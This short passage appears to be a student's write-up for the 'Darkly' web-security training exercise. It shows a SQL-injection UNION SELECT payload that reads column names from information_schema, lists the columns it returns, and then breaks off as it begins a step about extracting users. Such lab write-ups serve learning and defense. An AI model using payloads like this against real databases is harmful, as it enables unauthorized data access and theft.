DamianOdendaal/Darkly/SQL-INJECTION/SQL_Union.md

 ''
 -1  UNION SELECT  column_name, 1 FROM information_schema.columns where table_schema = database()
 ''
-when we run that we get the following names back

-user_id
-first_name
-last_name
-town
-country
-planet
-commentaire
-countersign

 3.)
 Getting the users on the site from the information we have just gotten ''